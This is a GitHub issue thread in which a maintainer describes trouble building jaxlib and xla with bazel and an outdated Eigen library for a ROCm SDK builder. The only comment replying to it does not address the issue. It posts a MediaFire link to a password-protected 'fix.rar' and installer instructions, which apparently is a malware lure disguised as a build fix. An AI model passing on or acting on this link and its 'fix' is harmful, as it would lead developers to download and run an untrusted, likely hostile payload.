### ISSUE TITLE
add xla and saxlib

### ISSUE THREAD

**Issue by lamikr** [lamikr/rocm_sdk_builder#147]
Google projects are using their own bazel for regular cmake for building the projects which I am not big fan of as my old experiences for building the tensorflow used to show that things were more likely broken than working and because even the smallest fix used to trigger the rebuild of everything instead of providing a way to just continue the build from the phase it had failed. (like any sane normal build system allows doing). So building and fixing anything bazel related used to be slow... 

Anyway I think it would be useful to have at least the jaxlib included in optional package list. 
Jaxlib iself requires xla and xla seems to require a pretty new upstream version of eugen instead of the one we have used from rocm... It took me a couple of days to figure out the errors I got when building a different versions of jaxlib but I think one of the problems was pretty simple in the end. Both the rocm version of eugen and latest offifial 3.4.0 version of eugen are 

Latest official eugen release is 3.4.0 from 2021 are too old but after building and installing the newest eugen sources, I was able to build the jaxlib. Now checking that the newest eugen library is ok also for our other apps before submitting the patches.

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
